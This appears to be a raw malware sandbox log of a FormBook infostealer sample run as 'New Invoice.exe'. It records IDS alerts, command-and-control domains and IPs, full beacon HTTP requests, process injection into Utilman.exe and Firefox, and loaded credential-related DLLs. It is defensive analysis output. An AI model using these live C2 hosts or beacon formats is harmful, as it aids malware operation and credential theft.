Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 162.241.62.235:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50004 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 104.21.77.112:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50020 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50024 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 192.64.118.221:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49789 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 66.235.200.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 162.241.62.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 104.21.77.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49787 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 162.241.62.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 185.87.149.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 192.64.118.221:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49786 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 174.136.53.218:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 174.136.53.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 104.21.77.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49782 -> 45.126.182.209:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 174.136.53.218:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50012 -> 185.87.149.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 185.87.149.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 162.241.62.235:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49792 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49784 -> 45.126.182.209:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49785 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49783 -> 45.126.182.209:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49788 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49921 -> 82.221.136.24:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 185.87.149.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 104.21.77.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49791 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 192.64.118.221:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49790 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49781 -> 45.126.182.209:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49793 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50028 -> 174.136.53.218:80

Source:	DNS query: www.menekankan.xyz
Source:	DNS query: www.balivegasbaru2.xyz
Source:	DNS query: www.dogebonus.xyz
Source:	DNS query: www.yusufzdemir.xyz
Source:	DNS query: www.366800008.xyz
Source:	DNS query: www.shibbets.xyz

Source: Joe Sandbox View	IP Address: 66.235.200.146 66.235.200.146
Source: Joe Sandbox View	IP Address: 66.235.200.146 66.235.200.146
Source: Joe Sandbox View	IP Address: 192.64.118.221 192.64.118.221

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wohk/?Dv=3Hs/dkX0QSuetV0Q4tNtT4Rqiuh8BqwTNxsiqCHkOKBg7vU2+sc67Bg9Ab6opUMx7jivlMaYWxCKBG6k9VtYh5Li+6pmoVR20Vy3OgGCDsPvZ20XEBzP1UfxTmNBekvMsA==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.menekankan.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /srvo/?Dv=FlOdcQrY7JoGJf2NwM726gzy/dSm1otNo6vwRVYkrg7dTHt/rtIPjFUAQ17nlekza6aeYZqiTGNt6twFRzd1271dGGJld8oAz+qkDYskw4T73NCVSJ7BYk23a2hYSx4rOg==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.kasun.wtfConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /gi1p/?Dv=29wY8b33u++oSzDFHJ8diWWGKjAQZD1Mx9BCLhB3+4G0urGSGT2UytLIbDwN5y6tUdq0brvIZ7JV7NOMa7ylvK4bHGyVib2rROHe7XM66BuCgnqit/L75+nkDgOWwFLyeA==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.jeanandolive.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /7c9r/?Dv=CQ+yTdlmIYk4szyaeRAnYVhL6RgHhLP4bxCCbk17hx60NTdDQc4VMEOQSLn/6QI6Tzm2afzvY24TEKi6Muzxs9FGFlBvcAiT+LMCHyhpM8Qbq7OcMYj1hQr3c7FA1kpCRA==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sigaque.todayConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /9aiw/?Dv=+m8Cg9vmYqZYtCGg8wp2oJoyOu4CESj6Ty9JOFY8nlfDcf4S12Ys4AyzBHXJGsHL9/XuLDGWvXy48O0YeRRmEMdalTm2RENnyJGU+37xbr6jI4AuAkaI2latq1MRwj4jPg==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.balivegasbaru2.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /pl9w/?Dv=C92KOZMQtoyoup/boHi5NU7VsXsDIPBm9LVdxQVJ9/zTScVGEu6ndtqNTeeCIeMDLYonsxv/g6UNOW602VYfio2z32PcROUym2YaSU9OqttAGpxNmL9Volx7X67DxzD2bA==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.mykitchen-ideas.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /fxp6/?VRap=W8etfZTPq4Mlnpd&Dv=UiGvK49Zfl9wpG3TVH+FUc98DwPNhtyka19ejbxUPMzUszhojdTHUkvbviJRYHBP61kDP9u2XCQH9m81Vyym8VqCksXASOVhfFo2fZvRc9Jv5BFxdBzvMxiLCJE1AY1f1A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dogebonus.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /inhp/?Dv=pJwPniMfKhS/C9FmUEV9SaKNqHMLNlu/UCXxHAyXkrOsotjt8kjtEk3W9UN0wsPRNlN7+Lp49A7MwULctkORdOb8Hhsjhs4qrf5CnrNLIlFG9gW54QHMbwjQVubEbJU2GQ==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.yusufzdemir.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /oz5a/?VRap=W8etfZTPq4Mlnpd&Dv=oeBzWQ4iNoo0v8vGmfOSihtFo8ZSdLGzCKJLwx0XZs10m0BgwOXofcl8PYTMqgD7GPCk9YKiSdzsZRYuWx0fzBu1xLrizdRRaz4Yf8ji9VfiHEOfolKa/6nG9d22pcDzQQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.366800008.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /g9oo/?Dv=wTOJHyEr3A8svWmzwkhoHT/7LAHDm56C7rUFz/Iy17CVVhtNuFY77VAFzKnZ9ffI1fhXM37DBUFOYH8v2EjCzy04tk4dsoSCZNLzb1Z6507HIDtg4QVCSXE/0Lc160UXZQ==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.nexave.liveConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /zwcw/?VRap=W8etfZTPq4Mlnpd&Dv=0xXlOId7I/S8JKIUqAtigG/HjiINOhJ3imhDDtlbDRNU5X4SNE2rB2Vk6gZ7R5V0W9iQTbm0cxPtEAnwld+l+Vlrh/bwYTTcmhylwJXBFts/Ia+AK2ZAIvhA/kfxcITEEg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gerfhd.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /r026/?Dv=swC8S26HeDLHO0lNmUEwi624wN9ztaM5WULVgR54VokOscX85wv7bHzAIuX2TE/D+nvoeU/gXmpQ4Np3sOVgisSjSvn0bH9dI9YIWf+D0LnFGlZIFVxj5gCInM+TZ47fkg==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.shibbets.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /ssuj/?Dv=nlCsCnTWyDp09XtyrSku0WiqFJl9UybpzibZhIj7pXfbQC4yXK2AJlxhy+gkOdJD/Xpi5HZ6BeNzWjBF/DuCbWdHnQM9L1WG9pPUDUw4lloD6RNHsLXQW0Jl+rK2dU1eqQ==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.maceoconsultores.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /cmh0/?Dv=lUbk74njJQRCcTrnjGuwsWNGQIBgHhQiwDFZZaFlt/G+R4m/WE+p0x2q7LrPA1Yz884VmeGJgsa6GD3dqwepMrlymxlFBxXgBAxm9X8ogVz0lyjH4wfhEue5DSgezm6+0g==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.08081.pinkConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /1wzu/?VRap=W8etfZTPq4Mlnpd&Dv=TbnKT15F/zrSdLQs7n1gxmZgcT0VeCUWv9YT9Q/V6jpqiGqWA1myswu2mi3MeERBqF2OZm32o+ynfWf/qZFx9nzZaR7DSzgs3OJaZnjKzyVGbr9H8A4btsba89dMdhFGQw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.goodnewsedutech.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /ly55/?Dv=C2Sj+zURvLGg4pJY9dM3BWGDFOVk1y0frbJ/Yh0tpeTqiLOorXYjCqrWhG+dAxdW1K4taCRAoPQVq95fso3SALsvcuJAAvHA/aaeAEGaQy2Dsw8Fzl7YTreDO9BlDyTLFw==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gnlokn.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Source: global traffic	HTTP traffic detected: GET /wohk/?Dv=3Hs/dkX0QSuetV0Q4tNtT4Rqiuh8BqwTNxsiqCHkOKBg7vU2+sc67Bg9Ab6opUMx7jivlMaYWxCKBG6k9VtYh5Li+6pmoVR20Vy3OgGCDsPvZ20XEBzP1UfxTmNBekvMsA==&VRap=W8etfZTPq4Mlnpd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.menekankan.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25

Source: global traffic	DNS traffic detected: DNS query: www.menekankan.xyz
Source: global traffic	DNS traffic detected: DNS query: www.kasun.wtf
Source: global traffic	DNS traffic detected: DNS query: www.jeanandolive.net
Source: global traffic	DNS traffic detected: DNS query: www.sigaque.today
Source: global traffic	DNS traffic detected: DNS query: www.balivegasbaru2.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mykitchen-ideas.shop
Source: global traffic	DNS traffic detected: DNS query: www.dogebonus.xyz
Source: global traffic	DNS traffic detected: DNS query: www.yusufzdemir.xyz
Source: global traffic	DNS traffic detected: DNS query: www.366800008.xyz
Source: global traffic	DNS traffic detected: DNS query: www.nexave.live
Source: global traffic	DNS traffic detected: DNS query: www.gerfhd.info
Source: global traffic	DNS traffic detected: DNS query: www.shibbets.xyz
Source: global traffic	DNS traffic detected: DNS query: www.maceoconsultores.net
Source: global traffic	DNS traffic detected: DNS query: www.08081.pink
Source: global traffic	DNS traffic detected: DNS query: www.goodnewsedutech.net
Source: global traffic	DNS traffic detected: DNS query: www.gnlokn.info

Source: unknown	Process created: C:\Users\user\Desktop\New Invoice.exe "C:\Users\user\Desktop\New Invoice.exe"
Source: C:\Users\user\Desktop\New Invoice.exe	Process created: C:\Users\user\Desktop\New Invoice.exe "C:\Users\user\Desktop\New Invoice.exe"
Source: C:\Users\user\Desktop\New Invoice.exe	Process created: C:\Users\user\Desktop\New Invoice.exe "C:\Users\user\Desktop\New Invoice.exe"
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Process created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"
Source: C:\Windows\SysWOW64\Utilman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\New Invoice.exe	Process created: C:\Users\user\Desktop\New Invoice.exe "C:\Users\user\Desktop\New Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process created: C:\Users\user\Desktop\New Invoice.exe "C:\Users\user\Desktop\New Invoice.exe"	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Process created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: cryptbase.dll	Jump to behavior
